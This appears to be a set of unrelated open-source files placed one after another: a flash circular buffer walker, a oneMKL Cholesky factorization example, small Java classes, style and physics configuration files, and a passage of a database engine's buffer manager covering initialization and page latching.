while ((getreg32(TIVA_VIMS_STAT) & VIMS_STAT_MODE_CHANGING) != 0)
{
/* Do nothing - wait for an eventual ongoing mode change to complete. */
}
}
| 5,420 |
6,224 |
/*
* Copyright (c) 2017 Nordic Semiconductor ASA
* Copyright (c) 2015 Runtime Inc
*
* SPDX-License-Identifier: Apache-2.0
*/
#include <fs/fcb.h>
#include "fcb_priv.h"
/*
* Call 'cb' for every element in flash circular buffer. If sector is specified,
* only elements with that flash_sector are reported.
*/
int
fcb_walk(struct fcb *fcb, struct flash_sector *sector, fcb_walk_cb cb,
void *cb_arg)
{
struct fcb_entry_ctx entry_ctx;
int rc;
entry_ctx.loc.fe_sector = sector;
entry_ctx.loc.fe_elem_off = 0U;
rc = k_mutex_lock(&fcb->f_mtx, K_FOREVER);
if (rc < 0) {
return -EINVAL;
}
while ((rc = fcb_getnext_nolock(fcb, &entry_ctx.loc)) !=
-ENOTSUP) {
k_mutex_unlock(&fcb->f_mtx);
if (sector && entry_ctx.loc.fe_sector != sector) {
return 0;
}
entry_ctx.fap = fcb->fap;
rc = cb(&entry_ctx, cb_arg);
if (rc) {
return rc;
}
rc = k_mutex_lock(&fcb->f_mtx, K_FOREVER);
if (rc < 0) {
return -EINVAL;
}
}
k_mutex_unlock(&fcb->f_mtx);
return 0;
}
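/*
 * Hypothetical usage sketch (not part of the upstream file): counting every
 * element currently stored in an FCB. The callback signature and the fields
 * touched here mirror what fcb_walk() passes to 'cb' above; the fcb instance
 * itself is assumed to have been set up elsewhere, and the names count_cb and
 * count_entries are illustrative only.
 *
 *	static int count_cb(struct fcb_entry_ctx *entry_ctx, void *arg)
 *	{
 *		int *count = arg;
 *
 *		(*count)++;
 *		return 0;	// non-zero would stop the walk and be returned
 *	}
 *
 *	int count_entries(struct fcb *fcb)
 *	{
 *		int count = 0;
 *
 *		// NULL sector => walk every sector of the circular buffer
 *		(void)fcb_walk(fcb, NULL, count_cb, &count);
 *		return count;
 *	}
 */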
| 457 |
310 |
<filename>Libraries/oneMKL/block_cholesky_decomposition/factor.cpp
//==============================================================
// Copyright © 2020 Intel Corporation
//
// SPDX-License-Identifier: MIT
// =============================================================
/*
*
* Content:
* Example of Cholesky factorization of a symmetric positive
* definite block tridiagonal matrix
************************************************************************
* Purpose:
* ========
* Testing accuracy of Cholesky factorization A=
* | L_1 | | L_1^t C_1^t |
* | C_1 L_2 | | L_2^t C_2^t |
* A = | . . |*| . . |
* | . . | | . C_N-1^t |
* | C_N-1 L_N | | L_N^t |
*
* of a symmetric positive definite block tridiagonal matrix A
* | D_1 B_1^t |
* | B_1 D_2 B_2^t |
* | B_2 D_3 B_3^t |
* | . . . |
* | . . . |
* | B_N-2 D_N-1 B_N-1^t |
* | B_N-1 D_N |
* by calling TEST_RES which calculates ratio of Frobenius norms
* ||A-L*L^t||_F/||A||_F.
*/
#include <cstdint>
#include <iostream>
#include <vector>
#include <CL/sycl.hpp>
#include "oneapi/mkl.hpp"
using namespace oneapi;
int64_t dpbltrf(sycl::queue queue, int64_t n, int64_t nb, double* d, int64_t ldd, double* b, int64_t ldb);
double test_res(int64_t, int64_t, double*, int64_t, double*, int64_t, double*, int64_t, double*, int64_t, double*, int64_t, double*, int64_t);
template<typename T>
using allocator_t = sycl::usm_allocator<T, cl::sycl::usm::alloc::shared>;
int main() {
if (sizeof(MKL_INT) != sizeof(int64_t)) {
std::cerr << "MKL_INT not 64bit" << std::endl;
return -1;
}
int64_t info = 0;
// Asynchronous error handler
auto error_handler = [&] (sycl::exception_list exceptions) {
for (auto const& e : exceptions) {
try {
std::rethrow_exception(e);
} catch(mkl::lapack::exception const& e) {
// Handle LAPACK related exceptions happened during asynchronous call
info = e.info();
std::cout << "Unexpected exception caught during asynchronous LAPACK operation:\ninfo: " << e.info() << std::endl;
} catch(sycl::exception const& e) {
// Handle not LAPACK related exceptions happened during asynchronous call
std::cout << "Unexpected exception caught during asynchronous operation:\n" << e.what() << std::endl;
info = -1;
}
}
};
sycl::device device{cl::sycl::default_selector{}};
sycl::queue queue(device, error_handler);
sycl::context context = queue.get_context();
if (device.get_info<sycl::info::device::double_fp_config>().empty()) {
std::cerr << "The sample uses double precision, which is not supported" << std::endl;
std::cerr << "by the selected device. Quitting." << std::endl;
return 0;
}
allocator_t<double> allocator_d(context, device);
MKL_INT n = 200;
MKL_INT nb = 20;
std::vector<double, allocator_t<double>> d(nb * n*nb, allocator_d);
std::vector<double, allocator_t<double>> b(nb * (n-1)*nb, allocator_d);
std::vector<double> d1(nb * n*nb);
std::vector<double> b1(nb * (n-1)*nb);
std::vector<double> d2(nb * n*nb);
std::vector<double> b2(nb * (n-1)*nb);
std::vector<MKL_INT> iseed = {1, 2, 33, 15};
auto D = [=,&d](int64_t i, int64_t j) -> double& { return d[i + j*nb]; };
std::cout << "Testing accuracy of Cholesky factorization\n";
std::cout << "of randomly generated positive definite symmetric\n";
std::cout << "block tridiagonal matrix by calculating residual.\n\n";
std::cout << "Matrix size = " << n << "\n";
std::cout << "Block size = " << nb << "\n";
std::cout << "...\n";
std::cout << "Matrices are being generated.\n";
std::cout << "...\n";
// Initializing arrays randomly
LAPACKE_dlarnv(2, iseed.data(), (n-1)*nb*nb, b.data());
cblas_dcopy((n-1)*nb*nb, b.data(), 1, b2.data(), 1);
for (int64_t k = 0; k < n; k++) {
for (int64_t j = 0; j < nb; j++) {
LAPACKE_dlarnv(2, iseed.data(), nb-j, &D(j,k*nb+j));
cblas_dcopy(nb-j, &D(j+1, k*nb+j), 1, &D(j, k*nb+j+1), nb);
}
// Diagonal dominance to make the matrix positive definite
for (int64_t j = 0; j < nb; j++) {
D(j, k*nb+j) += nb*3.0;
}
}
cblas_dcopy(n*nb*nb, d.data(), 1, d2.data(), 1);
std::cout << "Call Cholesky factorization\n";
std::cout << "...\n";
try {
info = dpbltrf(queue, n, nb, d.data(), nb, b.data(), nb);
} catch(sycl::exception const& e) {
// Handle not LAPACK related exceptions happened during synchronous call
std::cout << "Unexpected exception caught during synchronous call to SYCL API:\n" << e.what() << std::endl;
info = -1;
}
if(info) {
std::cout << "Factorization failed. info = " << info << std::endl;
return 1;
} else {
std::cout << "Cholesky factorization succeeded." << std::endl;
std::cout << "Testing the residual" << std::endl;
std::cout << "..." << std::endl;
double res = test_res(n, nb, d.data(), nb, b.data(), nb, d1.data(), nb, b1.data(), nb, d2.data(), nb, b2.data(), nb);
double eps = LAPACKE_dlamch('E');
std::cout << "Residual test" << std::endl;
std::cout << "||A-L*L^t||_F/||A||_F <= 5*EPS..." << std::endl;
if (res/eps > 5.0) {
std::cout << "failed: ||A-L*L^t||_F/||A||_F = " << res << std::endl;
return 1;
} else {
std::cout << "passed" << std::endl;
}
}
return 0;
}
| 2,916 |
1,082 |
package com.jzy.game.bydr.struct.room;
/**
* 经典渔场
* @author JiangZhiYong
* @QQ 359135103
* 2017年9月14日 上午9:30:30
*/
public class ClassicsRoom extends Room {
}
| 92 |
312 |
package org.eclipse.rdf4j.sail.shacl.ast.planNodes;
import org.eclipse.rdf4j.common.iteration.CloseableIteration;
import org.eclipse.rdf4j.sail.SailException;
import org.eclipse.rdf4j.sail.shacl.GlobalValidationExecutionLogging;
public abstract class LoggingCloseableIteration implements CloseableIteration<ValidationTuple, SailException> {
private final ValidationExecutionLogger validationExecutionLogger;
private final PlanNode planNode;
private boolean empty = false;
private boolean closed;
public LoggingCloseableIteration(PlanNode planNode, ValidationExecutionLogger validationExecutionLogger) {
this.planNode = planNode;
this.validationExecutionLogger = validationExecutionLogger;
}
@Override
public final ValidationTuple next() throws SailException {
ValidationTuple tuple = loggingNext();
if (GlobalValidationExecutionLogging.loggingEnabled) {
validationExecutionLogger.log(planNode.depth(), planNode.getClass().getSimpleName() + ".next()", tuple,
planNode, planNode.getId(), null);
}
return tuple;
}
@Override
public final boolean hasNext() throws SailException {
if (empty) {
return false;
}
boolean hasNext = localHasNext();
if (!hasNext) {
empty = true;
assert !localHasNext() : "Iterator was initially empty, but still has more elements! " + this.getClass();
close();
}
return hasNext;
}
@Override
public void close() throws SailException {
if (!closed) {
this.closed = true;
localClose();
}
}
protected abstract ValidationTuple loggingNext() throws SailException;
protected abstract boolean localHasNext() throws SailException;
protected abstract void localClose() throws SailException;
/**
* A default method since the iterators in the ShaclSail don't support remove.
*
* @throws SailException
*/
@Override
public void remove() throws SailException {
throw new UnsupportedOperationException();
}
}
| 597 |
1,505 |
{
"preset": "google",
"disallowSpacesInsideObjectBrackets": null,
"requireSpacesInsideObjectBrackets": {
"allExcept": [ "[", "]", "{", "}" ]
},
"disallowSpacesInsideArrayBrackets": null,
"requireSpacesInsideArrayBrackets": {
"allExcept": [ "[", "]", "{", "}" ]
},
"disallowKeywordsOnNewLine": [ ],
"disallowMultipleVarDecl": null,
"maximumLineLength": 120,
"requireSemicolons": true
}
| 152 |
852 |
import FWCore.ParameterSet.Config as cms
# Reading from DB
from CondCore.DBCommon.CondDBSetup_cfi import *
PoolDBESSource = cms.ESSource("PoolDBESSource",
CondDBSetup,
connect = cms.string('frontier://FrontierProd/CMS_COND_21X_ALIGNMENT'),
toGet = cms.VPSet(cms.PSet(
record = cms.string('TrackerAlignmentRcd'),
tag = cms.string('TibTidTecAllSurvey_v2')
),
cms.PSet(
record = cms.string('TrackerAlignmentErrorExtendedRcd'),
tag = cms.string('TibTidTecAllSurveyAPE_v2')
))
)
| 257 |
803 |
// Copyright (c) Microsoft Corporation.
// Licensed under the MIT License.
#include "std.hxx"
#include "_bf.hxx"
// Only Init requires the global cbPage; subsequent to this point the buffer manager is page independent and
// supports multiple page sizes concurrently.
//
#ifdef g_cbPage
#undef g_cbPage
#endif
#define g_cbPage g_cbPage_BF_NOT_ALLOWED_TO_USE_THIS_VARIABLE
#include <malloc.h>
// This is a global instance of the lookaside list for local buffers
CSmallLookasideCache* g_pBFAllocLookasideList;
///////////////////////////////////////////////////////////////////////////////
//
// BF API Functions
//
///////////////////////////////////////////////////////////////////////////////
/////////////////
// Init / Term
// The following functions control the initialization and termination of
// the buffer manager.
// Initializes the buffer manager for normal operation. Must be called
// only once and BFTerm() must be called before process termination. If an
// error is returned, the buffer manager is not initialized.
// Note that cbPageSizeMax is the maximum page size that will be requested
// of the buffer manager. Currently this is the page size ESE is configured
// for ... someday we might have no max page size.
ERR ErrBFInit( __in const LONG cbPageSizeMax )
{
ERR err = JET_errSuccess;
// must not have been initialized
Assert( !g_fBFInitialized );
Assert( !g_fBFCacheInitialized );
// CONSIDER: expose these settings
g_dblBFSpeedSizeTradeoff = 0.0;
g_dblBFHashLoadFactor = 5.0;
g_dblBFHashUniformity = 1.0;
g_csecBFLRUKUncertainty = 1.0;
// initialize BF's FTL tracing if in a regular mode of running
CallJ( ErrBFIFTLInit(), Validate );
// reset all stats
cBFOpportuneWriteIssued = 0;
PERFOpt( g_cBFVersioned = 0 );
// set all globals
Assert( g_rgbBFTemp == NULL );
Assert( g_pBFAllocLookasideList == NULL );
g_rgbBFTemp = NULL;
g_pBFAllocLookasideList = NULL;
// allocate temp buffer and lookaside list.
if ( BoolParam( JET_paramEnableViewCache ) )
{
g_rgbBFTemp = (BYTE*)PvOSMemoryPageAlloc( cbPageSizeMax, NULL );
if ( NULL == g_rgbBFTemp )
{
err = ErrERRCheck( JET_errOutOfMemory );
goto TermMemoryAlloc;
}
}
g_pBFAllocLookasideList = new CSmallLookasideCache();
if ( g_pBFAllocLookasideList == NULL )
{
err = ErrERRCheck( JET_errOutOfMemory );
goto TermMemoryAlloc;
}
// init all components
switch ( g_bfhash.ErrInit( g_dblBFHashLoadFactor,
g_dblBFHashUniformity ) )
{
default:
AssertSz( fFalse, "Unexpected error initializing BF Hash Table" );
case BFHash::ERR::errOutOfMemory:
CallJ( ErrERRCheck( JET_errOutOfMemory ), TermLRUK );
case BFHash::ERR::errSuccess:
break;
}
// for now we initialize the largest possible page we might be requested for.
g_pBFAllocLookasideList->Init( cbPageSizeMax );
switch ( g_bfavail.ErrInit( g_dblBFSpeedSizeTradeoff ) )
{
default:
AssertSz( fFalse, "Unexpected error initializing BF Avail Pool" );
case BFAvail::ERR::errOutOfMemory:
CallJ( ErrERRCheck( JET_errOutOfMemory ), TermLRUK );
case BFAvail::ERR::errSuccess:
break;
}
Assert( g_bfquiesced.FEmpty() );
CallJ( ErrBFIMaintScavengePreInit( max( 1, min( Kmax, INT( UlParam( JET_paramLRUKPolicy ) ) ) ),
double( UlParam( JET_paramLRUKCorrInterval ) ) / 1000000,
double( UlParam( JET_paramLRUKTimeout ) ),
g_csecBFLRUKUncertainty,
g_dblBFHashLoadFactor,
g_dblBFHashUniformity,
g_dblBFSpeedSizeTradeoff ), TermLRUK );
CallJ( ErrBFICacheInit( cbPageSizeMax ), TermLRUK );
g_fBFCacheInitialized = fTrue;
if ( !g_critpoolBFDUI.FInit( OSSyncGetProcessorCount(), rankBFDUI, szBFDUI ) )
{
CallJ( ErrERRCheck( JET_errOutOfMemory ), TermCache );
}
CallJ( ErrBFIMaintInit(), TermDUI );
// init successful
g_fBFInitialized = fTrue;
goto Validate;
// term all initialized threads / components
TermDUI:
g_critpoolBFDUI.Term();
TermCache:
g_fBFCacheInitialized = fFalse;
BFICacheTerm();
TermLRUK:
g_bflruk.Term();
g_bfavail.Term();
g_bfquiesced.Empty();
g_bfhash.Term();
TermMemoryAlloc:
OSMemoryPageFree( g_rgbBFTemp );
g_rgbBFTemp = NULL;
delete g_pBFAllocLookasideList;
g_pBFAllocLookasideList = NULL;
BFIFTLTerm();
Validate:
Assert( err == JET_errOutOfMemory ||
err == JET_errOutOfThreads ||
err == JET_errSuccess );
Assert( ( err != JET_errSuccess && !g_fBFInitialized ) ||
( err == JET_errSuccess && g_fBFInitialized ) );
return err;
}
// Terminates the buffer manager. Must be called before process
// termination to avoid loss of system resources. Cannot be called before
// ErrBFInit().
//
// NOTE: To avoid losing changes to pages, you must call ErrBFFlush() before
// BFTerm()!
//
// UNDONE: Calling BFTerm() without calling ErrBFFlush() can cause the loss
// of any deferred undo information attached to each buffer. This can result
// in recovery failure!!! Should BFTerm() force any existing deferred undo
// info to disk to prevent this?
void BFTerm()
{
// must have been initialized
Assert( g_fBFInitialized );
Assert( g_fBFCacheInitialized );
OSTraceWriteRefLog( ostrlSystemFixed, sysosrtlBfTerm, NULL );
if ( g_rgfmp )
{
for ( IFMP ifmp = cfmpReserved; ifmp < g_ifmpMax && FMP::FAllocatedFmp( ifmp ); ifmp++ )
{
if ( g_rgfmp[ ifmp ].FBFContext() )
{
BFPurge( ifmp );
}
}
}
g_fBFInitialized = fFalse;
// terminate all components
BFIMaintTerm();
g_critpoolBFDUI.Term();
g_fBFCacheInitialized = fFalse;
BFICacheTerm();
g_bflruk.Term();
BFITraceResMgrTerm();
g_bfavail.Term();
g_bfquiesced.Empty();
OSMemoryPageFree( g_rgbBFTemp );
g_rgbBFTemp = NULL;
#ifdef DEBUG
OSMemoryPageFree( g_pvIoThreadImageCheckCache );
g_pvIoThreadImageCheckCache = NULL;
#endif
g_pBFAllocLookasideList->Term();
delete g_pBFAllocLookasideList;
g_pBFAllocLookasideList = NULL;
g_bfhash.Term();
BFIFTLTerm();
}
///////////////////////
// System Parameters
// The following functions are used to get and set the many system
// parameters used by the buffer manager during runtime. Most of these
// parameters are used for optimizing performance.
// Returns the current size of the cache in pages.
ERR ErrBFGetCacheSize( ULONG_PTR* const pcpg )
{
// validate IN args
if ( pcpg == NULL )
{
return ErrERRCheck( JET_errInvalidParameter );
}
const LONG_PTR cbfCacheSizeT = cbfCacheSize;
const LONG_PTR cbfBFIAveCredit = CbfBFIAveCredit();
*pcpg = ( cbfCacheSizeT > cbfBFIAveCredit ) ? ( cbfCacheSizeT - cbfBFIAveCredit ) : 0;
return JET_errSuccess;
}
// Sets the current (preferred) size of the cache in pages.
// Requests a cache size maintenance task.
ERR ErrBFIStartCacheTasks()
{
ERR err = JET_errSuccess;
if ( g_fBFInitialized )
{
BFICacheSetTarget( OnDebug( -1 ) );
Call( ErrBFIMaintCacheSizeRequest() );
Call( ErrBFIMaintCacheStatsRequest( bfmcsrtForce ) );
}
HandleError:
return err;
}
ERR ErrBFSetCacheSize( const ULONG_PTR cpg )
{
ERR err = JET_errSuccess;
// set the user set point
g_critCacheSizeSetTarget.Enter();
g_cbfCacheUserOverride = cpg;
g_critCacheSizeSetTarget.Leave();
Call( ErrBFIStartCacheTasks() );
HandleError:
return err;
}
ERR ErrBFConsumeSettings( BFConsumeSetting bfcs, const IFMP ifmp )
{
ERR err = JET_errSuccess;
if ( bfcs & bfcsCacheSize )
{
Assert( ifmp == ifmpNil);
Call( ErrBFIStartCacheTasks() );
bfcs = BFConsumeSetting( bfcs & ~bfcsCacheSize );
}
if ( bfcs & bfcsCheckpoint )
{
BFIMaintCheckpointDepthRequest( &g_rgfmp[ifmp], bfcpdmrRequestConsumeSettings );
bfcs = BFConsumeSetting( bfcs & ~bfcsCheckpoint );
}
AssertSz( bfcs == 0, "Unknown settings (%d / 0x%x) bits left unhandled", bfcs, bfcs );
HandleError:
return err;
}
ERR ErrBFCheckMaintAvailPoolStatus()
{
const LONG_PTR cbfAvail = g_bfavail.Cobject();
if ( cbfAvail < cbfAvailPoolLow )
{
return ErrERRCheck( JET_wrnIdleFull );
}
return JET_errSuccess;
}
ERR ErrBFICapturePagePreimage( BF *pbf, RBS_POS *prbsposSnapshot )
{
// If page has already been dirtied once since the start of the snapshot, we do not need to collect pre-image again.
if ( g_rgfmp[ pbf->ifmp ].Dbid() == dbidTemp ||
!g_rgfmp[ pbf->ifmp ].FRBSOn() )
{
return JET_errSuccess;
}
if ( ((CPAGE::PGHDR *)pbf->pv)->dbtimeDirtied == 0 ||
((CPAGE::PGHDR *)pbf->pv)->dbtimeDirtied > g_rgfmp[ pbf->ifmp ].DbtimeBeginRBS() ||
pbf->rbsposSnapshot.lGeneration == g_rgfmp[ pbf->ifmp ].PRBS()->RbsposFlushPoint().lGeneration )
{
*prbsposSnapshot = pbf->rbsposSnapshot;
return JET_errSuccess;
}
ERR err = g_rgfmp[ pbf->ifmp ].PRBS()->ErrCapturePreimage( g_rgfmp[ pbf->ifmp ].Dbid(), pbf->pgno, (const BYTE *)pbf->pv, CbBFIBufferSize( pbf ), prbsposSnapshot );
OSTrace( JET_tracetagRBS, OSFormat(
"Collecting pre-image dbid:%u,pgno:%lu,dbtime:0x%I64x,dbtimeBegin:0x%I64x,rbspos:%u,%u\n",
g_rgfmp[ pbf->ifmp ].Dbid(),
pbf->pgno,
(DBTIME)((CPAGE::PGHDR *)pbf->pv)->dbtimeDirtied,
g_rgfmp[ pbf->ifmp ].DbtimeBeginRBS(),
prbsposSnapshot->lGeneration,
prbsposSnapshot->iSegment ) );
return err;
}
ERR ErrBFICaptureNewPage( BF *pbf, RBS_POS *prbsposSnapshot )
{
// If page has already been dirtied once since the start of the snapshot, we do not need to snapshot again.
if ( g_rgfmp[ pbf->ifmp ].Dbid() == dbidTemp ||
!g_rgfmp[ pbf->ifmp ].FRBSOn() )
{
return JET_errSuccess;
}
if ( pbf->rbsposSnapshot.lGeneration == g_rgfmp[ pbf->ifmp ].PRBS()->RbsposFlushPoint().lGeneration )
{
*prbsposSnapshot = pbf->rbsposSnapshot;
return JET_errSuccess;
}
ERR err = g_rgfmp[ pbf->ifmp ].PRBS()->ErrCaptureNewPage( g_rgfmp[ pbf->ifmp ].Dbid(), pbf->pgno, prbsposSnapshot );
OSTrace( JET_tracetagRBS, OSFormat(
"Collecting new-page dbid:%u,pgno:%lu,rbspos:%u,%u\n",
g_rgfmp[ pbf->ifmp ].Dbid(),
pbf->pgno,
prbsposSnapshot->lGeneration,
prbsposSnapshot->iSegment ) );
return err;
}
//////////////////
// Page Latches
ERR ErrBFReadLatchPage( BFLatch* pbfl, IFMP ifmp, PGNO pgno, BFLatchFlags bflf, const BFPriority bfpri, const TraceContext& tc )
{
ERR err;
AssertRTL( g_fBFInitialized );
// validate IN args
Assert( FBFNotLatched( ifmp, pgno ) );
Assert( !( bflf & ( bflfNew | bflfNewIfUncached ) ) );
Assert( tc.iorReason.Iorp() == iorpNone );
// the latch flag criteria are met for a possible fast latch using a user
// provided hint
const BFLatchFlags bflfMask = BFLatchFlags( bflfNoCached | bflfHint );
const BFLatchFlags bflfPattern = BFLatchFlags( bflfHint );
if ( ( bflf & bflfMask ) == bflfPattern )
{
// fetch the hint from the BFLatch. we assume that the latch contains
// either a valid PBF, a valid BFHashedLatch*, or NULL
Assert( FBFILatchValidContext( pbfl->dwContext ) || !pbfl->dwContext );
PBF pbfHint;
if ( pbfl->dwContext & 1 )
{
pbfHint = ((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->pbf;
}
else
{
pbfHint = PBF( pbfl->dwContext );
}
// the hint is not NULL (this can happen if a NULL hint was passed in
// or if a hashed latch hint was passed in and it is not currently
// owned by a BF)
if ( pbfHint != pbfNil )
{
// determine what latch we will acquire. if the BF has been promoted
// to a hashed latch then we will use the appropriate hashed latch for
// the appropriate processor. otherwise, we will simply use the latch
// on the BF
PLS* ppls;
CSXWLatch* psxwl;
const size_t iHashedLatch = pbfHint->iHashedLatch;
// Note: This is unioned with tickEligibleForNomination and tickViewLastRefreshed
// but when using it for ticks, the other code simply skips over the tiny
// number of cBFHashedLatch slots we use (16 today).
if ( iHashedLatch < cBFHashedLatch )
{
ppls = Ppls();
psxwl = &ppls->rgBFHashedLatch[ iHashedLatch ].sxwl;
}
else
{
ppls = NULL;
psxwl = &pbfHint->sxwl;
}
// try to latch the page as if bflfNoWait were specified. we must do
// this to be compatible with the locking scheme in ErrBFIEvictPage()
//
// NOTE: we must disable ownership tracking here because we may
// accidentally try to latch a buffer we already have latched (due
// to a stale latch hint) causing an assert. The assert would be
// invalid because we will later find out the buffer we double latched
// isn't the actual ifmp:pgno we were trying to latch, so we shouldn't
// have the latch anyway (as it isn't the right page) and release it.
CLockDeadlockDetectionInfo::DisableOwnershipTracking(); // proper not-ownership will be checked below
if ( psxwl->ErrTryAcquireSharedLatch() == CSXWLatch::ERR::errSuccess )
{
// verify that we successfully latched the intended BF and that BF
// contains the current version of this IFMP / PGNO and that it is
// not in an error state
PBF pbfLatch;
if ( iHashedLatch < cBFHashedLatch )
{
pbfLatch = ppls->rgBFHashedLatch[ iHashedLatch ].pbf;
}
else
{
pbfLatch = pbfHint;
}
if ( pbfLatch == pbfHint &&
FBFICurrentPage( pbfHint, ifmp, pgno ) &&
!pbfHint->fAbandoned &&
!FBFIChance( 25 ) &&
( err = pbfHint->err ) >= JET_errSuccess &&
( pbfHint->bfat != bfatViewMapped || FBFICacheViewFresh( pbfHint ) ) &&
pbfHint->bfrs == bfrsResident )
{
// transfer ownership of the latch to the current context. we
// must do this to properly set up deadlock detection for this
// latch
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
// now that we were able to get the latch and we have proven it is
// the current page we wanted, then we must not have owned it.
Assert( psxwl->FNotOwner() );
psxwl->ClaimOwnership( bfltShared );
// touch this page if requested
// When we are using the file-cache, clean pages can be evicted and re-read
// at a very low cost, so prioritize keeping dirty pages in cache to reduce
// write I/O - read I/O is from the file-cache and so very low cost
const BOOL fTouchPage = ( !( bflf & bflfNoTouch ) && !BoolParam( JET_paramEnableFileCache ) );
BFITouchResource( pbfHint, bfltShared, bflf, fTouchPage, PctBFCachePri( bfpri ), tc );
// return the page
PERFOpt( cBFCacheReq.Inc( PinstFromIfmp( pbfHint->ifmp ), pbfHint->tce ) );
pbfl->pv = pbfHint->pv;
pbfl->dwContext = DWORD_PTR( pbfHint );
if ( iHashedLatch < cBFHashedLatch )
{
ppls->rgBFHashedLatch[ iHashedLatch ].cCacheReq++;
pbfl->dwContext = DWORD_PTR( &ppls->rgBFHashedLatch[ iHashedLatch ] ) | 1;
}
else if ( pbfHint->bfls == bflsElect )
{
Ppls()->rgBFNominee[ 0 ].cCacheReq++;
}
Assert( FParentObjectClassSet( tc.nParentObjectClass ) );
Assert( FEngineObjidSet( tc.dwEngineObjid ) );
goto HandleError;
}
psxwl->ReleaseSharedLatch();
}
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
}
}
// latch the page
Call( ErrBFILatchPage( pbfl, ifmp, pgno, bflf, bfltShared, bfpri, tc ) );
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( err != wrnBFPageFault || !( bflf & bflfNoUncached ) );
Assert( err != errBFPageCached || ( bflf & bflfNoCached ) );
Assert( err != errBFPageNotCached || ( bflf & bflfNoUncached ) );
Assert( err != errBFLatchConflict || ( bflf & bflfNoWait ) );
if ( err >= JET_errSuccess )
{
Assert( FBFReadLatched( pbfl ) );
Assert( FBFICurrentPage( PbfBFILatchContext( pbfl->dwContext ), ifmp, pgno ) );
// Interestingly this is not guaranteed, because we're exceedingly clever and checksum
// the page under r-latch while someone else has an x-latch after an initial read, but
// that other thread hasn't finished and updated the BF err state.
//Assert( PbfBFILatchContext( pbfl->dwContext )->err != errBFIPageNotVerified );
}
else
{
Assert( FBFNotLatched( ifmp, pgno ) );
}
#endif // DEBUG
return err;
}
ERR ErrBFRDWLatchPage( BFLatch* pbfl, IFMP ifmp, PGNO pgno, BFLatchFlags bflf, const BFPriority bfpri, const TraceContext& tc )
{
ERR err;
AssertRTL( g_fBFInitialized );
// validate IN args
Assert( FBFNotLatched( ifmp, pgno ) );
Assert( !( bflf & ( bflfNew | bflfNewIfUncached ) ) );
Assert( tc.iorReason.Iorp( ) == iorpNone );
// the latch flag criteria are met for a possible fast latch using a user
// provided hint
const BFLatchFlags bflfMask = BFLatchFlags( bflfNoCached | bflfHint );
const BFLatchFlags bflfPattern = BFLatchFlags( bflfHint );
if ( ( bflf & bflfMask ) == bflfPattern )
{
// fetch the hint from the BFLatch. we assume that the latch contains
// either a valid PBF, a valid BFHashedLatch*, or NULL
Assert( FBFILatchValidContext( pbfl->dwContext ) || !pbfl->dwContext );
PBF pbfHint;
if ( pbfl->dwContext & 1 )
{
pbfHint = ((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->pbf;
}
else
{
pbfHint = PBF( pbfl->dwContext );
}
// the hint is not NULL (this can happen if a NULL hint was passed in
// or if a hashed latch hint was passed in and it is not currently
// owned by a BF)
if ( pbfHint != pbfNil )
{
// try to latch the page as if bflfNoWait were specified. we must do
// this to be compatible with the locking scheme in ErrBFIEvictPage()
//
// NOTE: we must disable ownership tracking here because we may
// accidentally try to latch a buffer we already have latched (due
// to a stale latch hint) causing an assert. The assert would be
// invalid because we will later find out the buffer we double latched
// isn't the actual ifmp:pgno we were trying to latch, so we shouldn't
// have the latch anyway (as it isn't the right page) and release it.
CLockDeadlockDetectionInfo::DisableOwnershipTracking(); // proper not-ownership will be checked below
if ( pbfHint->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
// this BF contains the current version of this IFMP / PGNO and it
// is not in an error state
if ( FBFICurrentPage( pbfHint, ifmp, pgno ) &&
!pbfHint->fAbandoned &&
FBFIUpdatablePage( pbfHint ) &&
( err = pbfHint->err ) >= JET_errSuccess &&
( pbfHint->bfat != bfatViewMapped || FBFICacheViewFresh( pbfHint ) ) &&
pbfHint->bfrs == bfrsResident )
{
// transfer ownership of the latch to the current context. we
// must do this to properly set up deadlock detection for this
// latch
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
// now that we were able to get the latch and we have proven it is
// the current page we wanted, then we must not have owned it.
// note we could do this right after x-latch because it is exclusive,
                // with itself, but we'll leave it here for symmetry with the fast
// read/s-latch path.
Assert( pbfHint->sxwl.FNotOwner() );
pbfHint->sxwl.ClaimOwnership( bfltExclusive );
// touch this page if requested
// When we are using the file-cache, clean pages can be evicted and re-read
// at a very low cost, so prioritize keeping dirty pages in cache to reduce
// write I/O - read I/O is from the file-cache and so very low cost
const BOOL fTouchPage = ( !( bflf & bflfNoTouch ) && !BoolParam( JET_paramEnableFileCache ) );
BFITouchResource( pbfHint, bfltExclusive, bflf, fTouchPage, PctBFCachePri( bfpri ), tc );
// return the page
PERFOpt( cBFCacheReq.Inc( PinstFromIfmp( pbfHint->ifmp ), pbfHint->tce ) );
pbfl->pv = pbfHint->pv;
pbfl->dwContext = DWORD_PTR( pbfHint );
goto HandleError;
}
pbfHint->sxwl.ReleaseExclusiveLatch();
}
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
}
}
// latch the page
Call( ErrBFILatchPage( pbfl, ifmp, pgno, bflf, bfltExclusive, bfpri, tc ) );
HandleError:
// validate OUT args
#ifdef DEBUG
Assert( err != wrnBFPageFault || !( bflf & bflfNoUncached ) );
Assert( err != errBFPageCached || ( bflf & bflfNoCached ) );
Assert( err != errBFPageNotCached || ( bflf & bflfNoUncached ) );
Assert( err != errBFLatchConflict || ( bflf & bflfNoWait ) );
if ( err >= JET_errSuccess )
{
Assert( FBFRDWLatched( pbfl ) );
Assert( FBFICurrentPage( PBF( pbfl->dwContext ), ifmp, pgno ) );
Assert( PBF( pbfl->dwContext )->err != errBFIPageNotVerified );
Assert( PBF( pbfl->dwContext )->err != errBFIPageRemapNotReVerified );
Expected( FBFUpdatableLatch( pbfl ) ); // because we could upgrade this to w-latch in place
}
else
{
Assert( FBFNotLatched( ifmp, pgno ) );
}
#endif // DEBUG
return err;
}
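// Illustrative sketch (not part of the engine): a typical caller pattern for
// ErrBFRDWLatchPage() / BFRDWUnlatch(), reusing a previously captured latch
// hint via bflfHint so the fast-latch path above can skip the hash lookup.
// The example function, its parameters, and the hint storage are hypothetical;
// the BF APIs called are the ones defined in this module.
#if 0
ERR ErrExampleReadForModify( const IFMP ifmp, const PGNO pgno, const BFPriority bfpri, const TraceContext& tc, DWORD_PTR* const pdwHint )
{
ERR err;
BFLatch bfl;
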